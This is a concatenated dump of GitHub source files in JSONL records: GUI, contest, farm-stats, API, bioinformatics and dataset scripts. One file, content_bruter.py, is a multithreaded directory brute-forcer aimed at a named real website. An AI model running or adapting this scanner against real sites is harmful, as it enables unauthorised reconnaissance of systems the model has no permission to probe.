weight=tkFont.BOLD)\n tk.Label(frame, font=ft0, bg=\"Khaki\", fg=\"black\", text=\"请自动调控机械臂参数\") \\\n .pack(padx=20)\n frame.pack(fill=tk.X)\n\n\n #**********主界面按钮设置*************\n ft2 = tkFont.Font(family=\"微软雅黑\", size=14, weight=tkFont.BOLD)\n tk.Button(canvas, text=\"手动抓取\", bg=\"cadetblue\", command=shou_dong, font=ft2, height=2, fg=\"white\", width=15) \\\n .pack(side=tk.LEFT, expand=tk.YES, anchor=tk.CENTER, padx=5)\n tk.Button(canvas, text=\"自动抓取\", bg=\"cadetblue\", command=zi_dong, font=ft2, height=2, fg=\"white\", width=15) \\\n .pack(side=tk.RIGHT, expand=tk.YES, anchor=tk.CENTER, padx=5)\n #********************************\n window.mainloop()\n #window.body() # 调用body()函数\nif __name__ == '__main__':\n main()","repo_name":"Sunqk5665/Python_projects","sub_path":"舵机控制界面/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":10524,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"} +{"seq_id":"32369618107","text":"import itertools\nimport heapq\n\nM = int( input() )\nuv = [ tuple( map( int, input().split() ) ) for _ in range( M ) ]\np = list( map( int, input().split() ) )\n\nfor i in range( 8 ):\n p[ i ] -= 1\n\nfor i in range( 9 ):\n if not i in p:\n p.append( i )\n break\n\nl = [ 0, 1, 2, 3, 4, 5, 6, 7, 8 ]\nvertex = []\nmapping = {}\nfor i, per in enumerate( itertools.permutations( l, 9 ) ):\n v = \"\".join( map( str, per ) )\n vertex.append( v )\n mapping[ v ] = i\n\nconnect = [ [] for _ in range( 9 ) ]\nfor u, v in uv:\n connect[ u - 1 ].append( v - 1 )\n connect[ v - 1 ].append( u - 1 )\n\ndef arrow( v ):\n v1 = vertex[ v ]\n u = v1[ -1 ]\n res = []\n for w in connect[ int( u ) ]:\n v2 = []\n for i in range( 9 ):\n if v1[ i ] == str( w ):\n v2.append( str( u ) )\n elif v1[ i ] == str( u ):\n v2.append( str( w ) )\n else:\n v2.append( v1[ i ] )\n\n v2 = \"\".join( v2 )\n res.append( mapping[ v2 ] )\n \n return res\n\nvisited = [ 0 ] * 362880\ncost = [ 10 ** 18 ] * 362880\ns = \"012345678\"\ncost[ mapping[ s ] ] = 0\nqueue = [ ( cost[ mapping[ s ] ], mapping[ s ] ) ]\nwhile queue:\n c, v = heapq.heappop( queue )\n visited[ v ] = 1\n for u in arrow( v ):\n if visited[ u ] == 1:\n continue\n \n if cost[ u ] > c + 1:\n cost[ u ] = c + 1\n heapq.heappush( queue, ( cost[ u ], u ) )\n\nans = cost[ mapping[ \"\".join( map( str, p ) ) ] ]\nif ans >= 10 ** 18:\n print( -1 )\nelse:\n print( ans )","repo_name":"tsukasa2/AtCoder","sub_path":"contest/ABC/224/abc224-d.py","file_name":"abc224-d.py","file_ext":"py","file_size_in_byte":1556,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"17438148861","text":"'''\r\n QueryDeadlineInjectData.py - Capture and record custom job statistics\r\n\r\n Puesdo-code:\r\n Check every active job in the queue:\r\n IF job is currently active (rendering/queued) THEN\r\n Return job object & tasks and calculate job stats object\r\n Query & inject average frame render time into column \"ExtraInfo2\" for each job\r\n Query & inject peak ram usage into column \"ExtraInfo3\" for each job\r\n\r\n Notes:\r\n 1. It is assumed a studio will rename the \"ExtraInfo2\" column used to something more meaningful such as \"Average Frame Render Time\" via repo options\r\n 2. It is assumed a studio will rename the \"ExtraInfo3\" column used to something more meaningful such as \"Peak RAM Usage\" via repo options\r\n 2. It is assumed we are only checking currently \"Active\" & \"Queued\" jobs only\r\n 3. 
It is assumed we are running this python script on a machine that has the Deadline client software already installed\r\n'''\r\n\r\nfrom System import TimeSpan\r\n\r\nfrom Deadline.Scripting import *\r\nfrom Deadline.Jobs import *\r\n\r\n\r\ndef __main__():\r\n\r\n    print(\"Script Started...\")\r\n\r\n    MIN_COMPLETED_TASKS = 0 # Min - Number of Completed Tasks BEFORE the job is queried. Change as applicable\r\n\r\n    for job in RepositoryUtils.GetJobs(True):\r\n        # Filter out non-\"Active\" jobs\r\n        if job.JobStatus != \"Active\":\r\n            continue\r\n        \r\n        print(\"JobStatus: %s\" % job.JobStatus)\r\n\r\n        jobId = job.JobId\r\n        print(\"JobId: %s\" % jobId)\r\n        \r\n        jobName = job.JobName\r\n        print(\"JobName: %s\" % jobName)\r\n\r\n        JobTaskCount = job.JobTaskCount\r\n        print(\"JobTaskCount: %s\" % JobTaskCount)\r\n        \r\n        jobCompletedChunks = job.CompletedChunks\r\n        print(\"JobCompletedChunks: %s\" % jobCompletedChunks)\r\n\r\n        job = RepositoryUtils.GetJob(jobId, True)\r\n        tasks = RepositoryUtils.GetJobTasks(job, True)\r\n        stats = JobUtils.CalculateJobStatistics(job, tasks)\r\n        \r\n        jobAverageFrameRenderTime = stats.AverageFrameRenderTime\r\n        jobPeakRamUsage = stats.PeakRamUsage / 1024 / 1024\r\n\r\n        print(\"JobAverageFrameRenderTime: %s\" % jobAverageFrameRenderTime)\r\n        print(\"JobPeakRamUsage: %s\" % jobPeakRamUsage)\r\n\r\n        if jobCompletedChunks >= MIN_COMPLETED_TASKS:\r\n            if not jobAverageFrameRenderTime.Equals(TimeSpan.Zero):\r\n                if jobPeakRamUsage != 0:\r\n                    \r\n                    timeSpan = jobAverageFrameRenderTime\r\n                    timeSpan = \"%02dd:%02dh:%02dm:%02ds\" % (timeSpan.Days, timeSpan.Hours, timeSpan.Minutes, timeSpan.Seconds)\r\n\r\n                    job.ExtraInfo2 = str(timeSpan)\r\n                    job.ExtraInfo3 = str(jobPeakRamUsage) + \"Mb\"\r\n\r\n                    RepositoryUtils.SaveJob(job)\r\n                else:\r\n                    print(\"Job Peak Ram Usage is 0Mb at this time, skipping check until next scan...\")\r\n            else:\r\n                print(\"Job Average Frame Render Time is 00:00:00 at this time, skipping check until next scan...\")\r\n        else:\r\n            print(\"Min Number of Completed Tasks: %s not yet reached, skipping check until next scan...\" % MIN_COMPLETED_TASKS)\r\n\r\n    print(\"...Script Completed\")\r\n","repo_name":"ThinkboxSoftware/Deadline","sub_path":"Examples/DeadlineCommand/FarmStats/QueryDeadlineInjectData.py","file_name":"QueryDeadlineInjectData.py","file_ext":"py","file_size_in_byte":3213,"program_lang":"python","lang":"en","doc_type":"code","stars":138,"dataset":"github-code","pt":"31"}
+{"seq_id":"44162527001","text":"class node:\n    def __init__(self, data, next=None):\n        self.data = data\n        self.next = next\n\n\nclass linkedlist:\n    def __init__(self):\n        self.head = None\n\n    def insert(self, data):\n        new_node = node(data)\n        if (self.head == None):\n            self.head = new_node\n        else:\n            current = self.head\n            while(current.next):\n                current = current.next\n            current.next = new_node\n\n    def dele(self, data):\n        current2 = self.head\n        while(current2):\n            if current2.data == data and current2 == self.head:\n                self.head = current2.next\n                break\n            elif current2.data == data:\n                prev.next = current2.next\n                break\n            prev = current2\n            current2 = current2.next\n\n    def printall(self):\n        current1 = self.head\n        while(current1):\n            print(current1.data)\n            current1 = current1.next\n\n    def search(self, data):\n        current3 = self.head\n        i = 1\n        flag = True\n        while(current3):\n            if current3.data == data:\n                flag = False\n                print('{}th element'.format(i))\n                break\n            if current3.next == None:\n                print('Not found')\n            current3 = current3.next\n            i += 1\n\n    def reverse(self, temp):\n        if temp:\n            self.reverse(temp.next)\n            
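# the recursive call runs first, so nodes are emitted tail-first, printing the list in reverse\n            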
print(temp.data, end=' ')\n        else:\n            return\n    \n\n\nll = linkedlist()\nll.insert(3)\nll.insert(4)\nll.insert(5)\nll.insert(6)\nll.insert(7)\nll.search(8)\nll.dele(8)\nll.reverse(ll.head)\n","repo_name":"TanvirAhamadNSL/prac","sub_path":"python_basic/study ipynb/singly_linked_list.py","file_name":"singly_linked_list.py","file_ext":"py","file_size_in_byte":1651,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"}
+{"seq_id":"5454360262","text":"import requests\nimport json\nimport logging\nfrom functools import lru_cache\nimport config.operations as operations\n\nlogging.captureWarnings(True)\n\n##\n## function to obtain a new OAuth 2.0 token from the authentication server\n##\n@lru_cache(maxsize=1)\ndef get_new_token():\n\n    url = 'https://id.cisco.com/oauth2/default/v1/token'\n    client_id = operations.get_config_value(\"ciscoClientId\", \"configurations.json\")\n    client_secret = operations.get_config_value('ciscoClientSecret', \"configurations.json\")\n\n    params = {\n        'grant_type': 'client_credentials',\n        'client_id': client_id,\n        'client_secret': client_secret\n    }\n\n    headers = {\n        'Content-Type':'application/x-www-form-urlencoded'\n    }\n\n    token_response = requests.post(url=url, params=params, headers=headers)\n    \n    if token_response.status_code == 200:\n        return token_response.json()['access_token']\n    \n    return None\n\n# Caching results of the same products so we don't have to slam the Cisco API for larger queries\n@lru_cache(maxsize=64)\ndef call(pid, version):\n\n    ## \n    ## \tobtain a token before calling the API for the first time\n    ##\n    token = get_new_token()\n\n    url = f\"https://apix.cisco.com/software/suggestion/v2/suggestions/releases/productIds/{pid}?pageIndex=1\"\n\n    payload = {}\n    headers = {\n        'Authorization': f'Bearer {token}',\n        'Content-Type': 'application/json'\n    }\n\n    response = requests.request(\"GET\", url, headers=headers, data=payload)\n    if response.status_code == 200:\n        response_dict = response.json()\n        softwarelist = response_dict['productList']\n        \n        for software in softwarelist:\n            # Software Type Ids for IOS-XE, NXOS and IOS respectively\n            if software['product']['softwareType'] in ['IOS Software', 'IOS XE Software', 'NX-OS System Software']:\n                return software['suggestions'][0]['relDispName']\n\n    else:\n        return None","repo_name":"netman-su/netrun-app","sub_path":"netrun/api/cisco_api.py","file_name":"cisco_api.py","file_ext":"py","file_size_in_byte":1945,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"}
+{"seq_id":"14810172356","text":"import argparse\n\nimport PyAstronomy\nimport numpy as np\nfrom Bio import Phylo\nfrom tqdm import tqdm\nimport os\nfrom ete3 import Tree\nimport json\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\nfrom process_beast_log import numericToCalander\n\ndef numericToCalander(d):\n    return PyAstronomy.pyasl.decimalYearGregorianDate(d)\n\ndef get_importation_dates(treepath, branch_dates):\n    \"\"\"\n    get importation dates according to Volz report here:\n    http://sarscov2phylodynamics.org/2020/04/08/importations.html\n    :param treepath: a path to a tree file\n    :param branch_dates: json file containing dates for each internal node.\n    one of NextStrain standard outputs\n    :return: a list containing the distribution of dates.\n    \"\"\"\n    # open tree files\n    tree = Phylo.read(treepath, \"newick\")\n    with open(branch_dates) as json_file:\n        nodes_to_dates = json.load(json_file)\n\n    tips = [t for t in tree.get_terminals() if 'Israel' 
in t.name]\n    dates_distribution = []\n    for t in tips:\n        tip_date = nodes_to_dates['nodes'][t.name]['numdate']\n        node_path = [n for n in tree.get_path(t) if 'Wuhan' not in n.name and 'Israel' not in n.name]\n        # remove outlier nodes\n        #node_path = [n for n in node_path if (n.name != 'NODE_0000034' or n.name != 'NODE_0000035')]\n        node_path = [n for n in node_path]\n        node_names = [n.name for n in node_path if '.' not in n.name] # remove the 1.00 addition after polytomy splitting\n        #dates = [nodes_to_dates['nodes'][n]['numdate'] for n in node_names]\n        dates = []\n        for node in node_names:\n            if nodes_to_dates['nodes'][node]['numdate'] < 2019.9:\n                print(\"WARNING: Detected a date before 2019.9\")\n            dates.append(nodes_to_dates['nodes'][node]['numdate'])\n        mean_dates = [np.mean([tip_date, node_date]) for node_date in dates]\n        dates_distribution.extend(mean_dates)\n    return dates_distribution\n\ndef analyze_simulated_trees():\n\n    n = 20\n    dfs = []\n    for i in range(n):\n        treetime_outfile = fr\"/Users/daniellemiller/Documents/GitHub/COVID19/data/\" \\\n                            fr\"importations_sampled_trees/sim_treetime_{i+1}.nwk\"\n        node_data_outfile = fr\"/Users/daniellemiller/Documents/GitHub/COVID19/data/\" \\\n                            fr\"importations_sampled_trees/sim_branch_lengths_{i+1}.json\"\n        vals = get_importation_dates(treetime_outfile, node_data_outfile)\n        df = pd.DataFrame({'sim': i+1, 'dates': vals})\n        dfs.append(df)\n    res = pd.concat(dfs)\n\n    # plot the kde\n    ax = sns.distplot(res['dates'], hist=False, kde_kws={'shade': True}, color='#D9C12B')\n    ax.axvline(2020.14, label='2020-02-21', linestyle='--', color='red', alpha=0.5)\n    ax.axvline(2020.253, label='last sample', linestyle='--')\n    # rename the xticks with labels\n    x_ticks = ax.get_xticks()\n    ax.set_xticks(x_ticks[::2])\n    xlabels = [pd.to_datetime(numericToCalander(y)).date() for y in x_ticks[::2]]\n    ax.set_xticklabels(xlabels)\n    plt.legend()\n    sns.despine(offset=15)\n    plt.show()\n\nif __name__ == \"__main__\":\n\n    parser = argparse.ArgumentParser(\n        description=\"Down sample sequences from FASTA\",\n        formatter_class=argparse.ArgumentDefaultsHelpFormatter\n    )\n    parser.add_argument(\"--tree_input\", required=True, help=\"The raw ML tree\")\n    parser.add_argument(\"--aln\", required=True, help=\"alignment file path\")\n    parser.add_argument(\"--metadata\", required=True, help=\"metadata tsv file path\")\n    parser.add_argument(\"--nsim\",type=int, default=20, help=\"number of simulations\")\n    args = parser.parse_args()\n\n    skeleton_tree_path = args.tree_input\n    aln = args.aln\n    metadata = args.metadata\n    nsim = args.nsim\n\n    for i in tqdm(range(nsim)):\n        out_file = fr\"../results/sim_tree_{i+1}.nwk\"\n        # resolve polytomies and collapse low confidence splits\n\n        tree = Tree(skeleton_tree_path)\n        tree.resolve_polytomy(recursive=True)\n        tree.write(outfile=out_file)\n\n\n        # re-run tree time to create a new pool of trees\n        treetime_outfile = fr\"../results/sim_treetime_{i+1}.nwk\"\n        node_data_outfile = fr\"../results/sim_branch_lengths_{i+1}.json\"\n        clock_rate = np.random.uniform(0.0009,0.0015)\n        os.system(f\"augur refine \\\n            --tree {out_file} \\\n            --alignment {aln} \\\n            --metadata {metadata} \\\n            --output-tree {treetime_outfile} \\\n            --output-node-data {node_data_outfile} \\\n            --root Wuhan-Hu-1/2019 \\\n            --timetree \\\n            --clock-rate {clock_rate} \\\n            --coalescent skyline \\\n            --date-inference marginal \\\n            --divergence-unit mutations \\\n            --date-confidence \\\n            --no-covariance\")\n        #re-run ancestral state reconstruction\n        ancestral_node_data_outfile = 
fr\"/Users/daniellemiller/Documents/GitHub/COVID19/data/\" \\\n fr\"importations_sampled_trees/sim_nt_muts_{i+1}.json\"\n os.system(f\"augur ancestral \\\n --tree {treetime_outfile} \\\n --alignment {aln} \\\n --output-node-data {ancestral_node_data_outfile} \\\n --inference joint \\\n --keep-ambiguous\")\n\n\n\n\n\n","repo_name":"Stern-Lab/SARSCOV2NGS","sub_path":"scripts/approximate_importations.py","file_name":"approximate_importations.py","file_ext":"py","file_size_in_byte":5471,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"31"} +{"seq_id":"32586313575","text":"import os\n\nimport sublime\nimport sublime_plugin\n\n\nclass EePrependModCommand(sublime_plugin.TextCommand):\n def run(self, edit):\n self.validate_file_extension()\n\n if self.is_prepended_module_file_opened():\n original_filepath = self.view.file_name().replace('ee', '')\n return self.view.window().open_file(original_filepath)\n\n self.set_prepended_module_path()\n self.set_klass_name()\n\n if not self.is_prepend_mod_line_exist():\n self.add_prepend_mod_line(edit)\n\n if not os.path.exists(self.prepended_module_path):\n create_file(self.prepended_module_path, self.build_prepended_module_skeleton())\n\n self.view.window().open_file(self.prepended_module_path)\n\n # Setters\n\n def set_prepended_module_path(self):\n original_path = self.view.file_name()\n paths = original_path.split('/')\n\n try:\n split_folder_index = paths.index('app')\n split_folder_name = 'app'\n except ValueError:\n split_folder_index = paths.index('lib')\n split_folder_name = 'lib'\n\n root_path = '/'.join(paths[:split_folder_index] + [f'ee/{split_folder_name}/'])\n\n if split_folder_name == 'app':\n if 'concerns' in paths:\n self.prepended_module_path = root_path + '/'.join(paths[split_folder_index + 1:-1] + ['ee', paths[-1]])\n else:\n self.prepended_module_path = root_path + '/'.join([paths[split_folder_index + 1], 'ee'] + paths[split_folder_index + 2:])\n else:\n self.prepended_module_path = root_path + '/'.join(['ee'] + paths[split_folder_index + 1:])\n\n def set_klass_name(self):\n # Finds start index from string (ee/.../ee/)\n start_index = self.prepended_module_path.rindex('ee') + 2\n # Filepath has extension `.rb`\n end_index = self.prepended_module_path.index('.')\n\n klass_path = self.prepended_module_path[start_index:end_index]\n # Camelize & glue together with `::`\n self.klass_name = klass_path.title().replace('_', '').replace('/', '::')[2:]\n\n # Actions\n\n def add_prepend_mod_line(self, edit):\n self.view.insert(edit, self.view.size(), f\"\\n{self.klass_name}.prepend_mod\")\n self.view.run_command('save')\n\n # Helper methods\n\n def validate_file_extension(self):\n if not '.rb' in self.view.file_name():\n raise ValueError('Not ruby file')\n\n if 'ee' in self.view.file_name() and not self.is_prepended_module_file_opened():\n raise ValueError('Not prepened module path')\n\n def is_prepended_module_file_opened(self):\n return self.view.file_name().count('ee') == 2\n\n def is_prepend_mod_line_exist(self):\n last_line_number = self.view.rowcol(self.view.size())[0]\n\n prelast_line_point = self.view.text_point(last_line_number - 1, 0)\n prelast_line_region = self.view.line(prelast_line_point)\n prelast_line_content = self.view.substr(prelast_line_region)\n\n return 'prepend_mod' in prelast_line_content\n\n def build_prepended_module_skeleton(self):\n skeleton = '# frozen_string_literal: true\\n\\n'\n namespaces = ['EE'] + self.klass_name.split('::')\n indent = 0\n\n for namespace in 
namespaces:\n skeleton += f\"{indent * ' '}module {namespace}\\n\"\n indent += 2\n\n skeleton += f\"{indent * ' '}extend ::Gitlab::Utils::Override\\n\"\n\n while indent != 0:\n indent -= 2\n skeleton += f\"{indent * ' '}end\\n\"\n\n return skeleton\n\ndef create_file(filename, data):\n os.makedirs(os.path.dirname(filename), exist_ok=True)\n\n with open(filename, 'w') as file:\n file.write(data)\n\n","repo_name":"zzaakiirr/sublime-gitlab-ee-prepend-mod","sub_path":"EePrependMod.py","file_name":"EePrependMod.py","file_ext":"py","file_size_in_byte":3755,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"34160945600","text":"from pathlib import Path\nfrom sklearn.model_selection import train_test_split\nfrom PIL import Image\nfrom sklearn.preprocessing import LabelEncoder\nfrom torch.utils.data import Dataset\nfrom torchvision import transforms\nfrom collections import Counter\nimport numpy as np\nimport pickle\nimport torch\n\n# SimpsonsDataset wrapper for data load\nclass SimpsonsDataset(Dataset):\n def __init__(self, files, mode, aug_len=None):\n super().__init__()\n self.labels = [path.parent.name for path in files]\n\n self.mode = mode\n\n self.files = files\n\n self.label_encoder = LabelEncoder()\n self.label_encoder.fit(self.labels)\n\n if self.mode == 'train':\n with open('label_encoder.pkl', 'wb') as lb_file:\n pickle.dump(self.label_encoder, lb_file)\n\n def __len__(self):\n return len(self.files)\n\n def load_img(self, img):\n image = Image.open(img)\n return self.prepare_sample(image)\n\n def prepare_sample(self, img):\n transform = transforms.Compose([\n transforms.ToTensor(),\n transforms.Resize((290, 290)),\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])\n ])\n image = transform(img)\n return image.numpy().astype(np.float32)\n\n def transform_sample(self, img):\n \"\"\"\n param img: image for transform\n return: transformed image\n \"\"\"\n\n transform = {\n 'Crop': transforms.Compose([\n transforms.Resize((310, 310)),\n transforms.CenterCrop((305, 305)),\n transforms.RandomCrop((290, 290))\n ]),\n 'Rotate': transforms.Compose([\n transforms.RandomRotation((-25, 25))\n ]),\n 'Hflip': transforms.Compose([\n transforms.RandomHorizontalFlip(p=1)\n ])\n }\n transform_list = list(transform.keys())\n\n augmenter = transform[transform_list[np.random.randint(3)]]\n aug_img = augmenter(img)\n\n return aug_img\n\n def __getitem__(self, item):\n img = torch.from_numpy(self.load_img(self.files[item]))\n x = self.transform_sample(img) if self.mode == 'train' else img\n\n if self.mode == 'test':\n return x\n\n y = self.label_encoder.transform([self.labels[item]]).item()\n return x, y\n\n\n\"\"\"\n Inside the folder \"simpsons_dataset\" contains the same folder \"simpsons_dataset\",\n which should be deleted because it duplicates the same data.\n data/simpsons_dataset/simpsons_dataset/\n\"\"\"\n# shutil.rmtree('../data/simpsons_dataset/simpsons_dataset/') # delete double folder data\ntrain_files_path = Path(\"../data/simpsons_dataset/\") # data path\n\nfiles = list(train_files_path.rglob('*.jpg'))\nlabels = np.unique([path.parent.name for path in files])\n\ndef augmentation(img):\n transform = {\n 'Crop': transforms.Compose([\n transforms.Resize((310, 310)),\n transforms.CenterCrop((305, 305)),\n transforms.RandomCrop((290, 290))\n ]),\n 'Rotate': transforms.Compose([\n transforms.RandomRotation((-25, 25))\n ]),\n 'Hflip': transforms.Compose([\n transforms.RandomHorizontalFlip(p=1)\n ])\n }\n transform_list = 
\nif False:\n    num_aug = 1500\n    to_add = Counter([path.parent for path in files])\n\n    for name, value in to_add.items():\n        add = (num_aug - value)\n        idx = 0\n        last_num = 0\n        while add > 0:\n            add_zero = '0' * (4 - len(str(idx)))\n            pattern_src = '{}\\pic_{}{}.jpg'\n            src = pattern_src.format(name, add_zero, idx)\n            if Path(src).is_file():\n                add_zero = '0' * (4 - len(str(last_num)))\n                img = Image.open(src)\n                img.load()\n                img = augmentation(img)\n                print(img, name, add, pattern_src.format(name, 'aug_'+add_zero, last_num))\n                img.save(pattern_src.format(name, 'aug_'+add_zero, last_num))\n                last_num += 1\n                add -= 1\n            idx = 0 if idx == value else idx + 1\nelse:\n    train_files_path = Path(\"../data/simpsons_dataset/\") # data path\n\n    files = list(train_files_path.rglob('*.jpg'))\n    labels = np.unique([path.parent.name for path in files])\n    print(files)\n    train_files_path, valid_files_path = train_test_split(files, train_size=0.8,\n                                                          stratify=[path.parent.name for path in files])\n\n    data_train = SimpsonsDataset(train_files_path, 'train')\n    data_valid = SimpsonsDataset(valid_files_path, 'valid')","repo_name":"stolzor/classification_simpsons","sub_path":"preproc_data/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":4780,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"37520742065","text":"\"\"\"\n    Brute-force directory paths on a target web site\n\"\"\"\nimport urllib.request\nimport threading\nimport queue\nimport urllib.parse\n\nthreads = 50\ntarget_url = \"https://www.xs8.cn\"\nword_list_file = \"D://all.txt\"\nresume = None\nuser_agent = \"Mozilla/5.0 (X11; Linux x86_64; rv:19.0) Gecko/20100101 Firefox/19.0\"\nattempt_list = []\n\n\ndef build_word_list(the_word_list_file):\n    words = queue.Queue()\n    with open(the_word_list_file, \"rb\") as f:\n        raw_buffer = f.readlines()\n        for word in raw_buffer:\n            word = word.rstrip()\n            words.put(word.decode())\n            # print(word.decode())\n    return words\n\n\ndef dir_bruter(word_queue, extensions=None):\n    while not word_queue.empty():\n        attempt = word_queue.get()\n        print(attempt)\n        if \".\" not in attempt:\n            attempt_list.append(\"/{}/\".format(attempt))\n            if extensions:\n                for extension in extensions:\n                    attempt_list.append(\"/{}{}\".format(attempt,extension))\n        else:\n            attempt_list.append(\"/{}\".format(attempt))\n\n    for brute in attempt_list:\n        url = \"{}{}\".format(target_url, urllib.parse.quote(brute))\n        try:\n            headers = {\"User-Agent\": user_agent}\n            opener = urllib.request.Request(url, headers=headers)\n            response = urllib.request.urlopen(opener)\n            if len(response.read()):\n                print(\"[{}] => {}\".format(response.code, url))\n        except urllib.request.URLError as e:\n            if hasattr(e, \"code\") and e.code != 404:\n                print(\"[{}] => {}\".format(e.code, url))\n\n\ndef main():\n    words_queue = build_word_list(word_list_file)\n    extensions = [\".php\", \".bak\", \".orig\", \".inc\"]\n\n    for i in range(threads):\n        thr = threading.Thread(target=dir_bruter, args=(words_queue, extensions))\n        thr.start()\n\n\nif __name__ == '__main__':\n    main()","repo_name":"zhangbios/LearnBlack","sub_path":"Unit4/content_bruter.py","file_name":"content_bruter.py","file_ext":"py","file_size_in_byte":1920,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"} +{"seq_id":"13993805608","text":"#!/usr/bin/python3\ndef uppercase(str):\n    toupper = \"\"\n    for n in str:\n        if ord(n) < 123 
and ord(n) > 96:\n            num = ord(n) - 32\n            toupper += chr(num)\n        else:\n            toupper += n\n    print(\"{}\".format(toupper))\n","repo_name":"Bezawork-pr/alx-higher_level_programming","sub_path":"0x01-python-if_else_loops_functions/8-uppercase.py","file_name":"8-uppercase.py","file_ext":"py","file_size_in_byte":260,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"25463572866","text":"#!/usr/bin/python3\n\nimport sys\n\nbuff = {}\n\nwith open('KKS15_vypis_disku_150910.txt', 'r') as f:\n\tfor line in f:\n\t\ttry:\n\t\t\tname, fn = line.split('\\\\')\n\t\texcept ValueError:\n\t\t\tbroken = line.split('\\\\')\n\t\t\tname = broken[2]\n\t\t\tfn = broken[3]\n\n\t\tname = name.upper().strip()\n\t\tfn = int(fn.replace('.tif','').replace('x7','').strip())\n\n\t\tif name not in buff:\n\t\t\tbuff[name] = []\n\n\t\tif fn not in buff[name]:\n\t\t\tbuff[name].append(fn)\n\t\telse:\n\t\t\tprint('Dup: ' + str(fn))\n\nfor name in buff:\n\ti=0\n\tk=sorted(buff[name])\n\tl=len(k)\n\twhile True:\n\t\tif i + 1 == l: break\n\t\tif k[i+1] - k[i] != 1:\n\t\t\tprint('Hole: ' + name + ' -> ' + str(k[i]))\n\t\ti+=1\n\n","repo_name":"CzechLitBib/UCL","sub_path":"graveyard/shelf/seq.py","file_name":"seq.py","file_ext":"py","file_size_in_byte":621,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"31"} +{"seq_id":"70312861209","text":"#Challenge #10: THE API\n#Published: 06/03/23 | MEDIUM\n\n#Calling an API is one of the most common tasks in programming.\n#Implement an HTTP call to an API (whichever one you like) and print its result to the terminal.\n# For example: Pokémon, Marvel...\n\n#Here is a list of possible APIs:\n#https://github.com/public-apis/public-apis\n \n\n#python -m pip install --upgrade pip \n#pip install requests \n\nimport requests\n\ndef get_pokemons():\n    url = \"https://pokeapi.co/api/v2/pokemon?limit=20\"\n    response = requests.get(url)\n    for index, pokemon in enumerate(response.json()[\"results\"]):\n        pokemon_name = pokemon[\"name\"]\n        print(f\"{index + 1}) {pokemon_name}\")\n\ndef get_starwars_characters():\n    url = \"https://swapi.dev/api/people/?limit=10&page=2\"\n    response = requests.get(url)\n    for index, character in enumerate(response.json()[\"results\"]):\n        character_name = character[\"name\"]\n        print(f\"{index + 1}) {character_name}\")\n\nif __name__ == '__main__':\n    get_pokemons()\n    get_starwars_characters()","repo_name":"gwf-training/python-retos-semanales","sub_path":"src/retos-2023/10-request-api.py","file_name":"10-request-api.py","file_ext":"py","file_size_in_byte":1061,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"19765103855","text":"import numpy as np\n\ndef main():\n    n = int(input())\n    a = np.array(list(map(int,input().split())))\n    cost = float(\"inf\")\n    for integer in range(-100, 101):\n        to_list = np.ones(n)*integer\n        temp = np.sum( (a - to_list) ** 2 )\n        cost = min(cost, temp)\n    print(int(cost))\n\n\nif __name__ == \"__main__\":\n    main()","repo_name":"shimomura314/AtcoderCodes","sub_path":"ABC043/C.py","file_name":"C.py","file_ext":"py","file_size_in_byte":335,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"29672508441","text":"a, b = input().split()\n\nbrown = int(a)\n\nred = int(b)\n\nanswer = []\n\nwidth = brown + red\n\nfor i in range(1,int(width/2)):\n    if(width % i == 0):\n        n = i\n        m = width//n\n        if(n < m):\n            continue\n\n        tmp = (n-2) 
* (m-2)\n        tmp2 = width - tmp\n        if(tmp == red and tmp2 == brown):\n            print(n,m)\n            break\n","repo_name":"InSeok9068/Algorithm","sub_path":"프로그래머스/카펫.py","file_name":"카펫.py","file_ext":"py","file_size_in_byte":359,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"7640977948","text":"from pathlib import Path\n\nfrom lxml import etree\n\nfrom . import shared\nfrom core.documents.templates import EPUB2Template\n\n\ndef make_html_element(cover_file: Path) -> etree._Element:\n    template = EPUB2Template([])\n    html = template.generate_root_element(\"Cover\")\n\n    head = html.find(\"head\")\n    assert head is not None\n    style = make_style_element()\n    head.append(style)\n\n    body = make_body_element(cover_file)\n    html.append(body)\n\n    return html\n\n\ndef make_body_element(cover_file: Path) -> etree._Element:\n    body = etree.Element(\"body\")\n\n    div = etree.Element(\n        \"div\",\n        attrib={\n            \"class\": \"cover-container\"\n        }\n    )\n    body.append(div)\n\n    img = etree.Element(\n        \"img\",\n        attrib={\n            \"alt\": \"Cover\",\n            \"src\": cover_file.as_posix()\n        }\n    )\n    div.append(img)\n\n    return body\n\n\ndef make_style_element() -> etree._Element:\n    style = etree.Element(\n        \"style\",\n        attrib={\n            \"type\": \"text/css\"\n        }\n    )\n    style.text = shared.CSS_STYLE\n    return style\n","repo_name":"jayruin/web-epubs","sub_path":"core/documents/cover_xhtml/epub2.py","file_name":"epub2.py","file_ext":"py","file_size_in_byte":1075,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"33114180352","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.tree import DecisionTreeClassifier\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom sklearn.metrics import classification_report, confusion_matrix\nfrom sklearn import tree\n\n# Load the data\ndata = 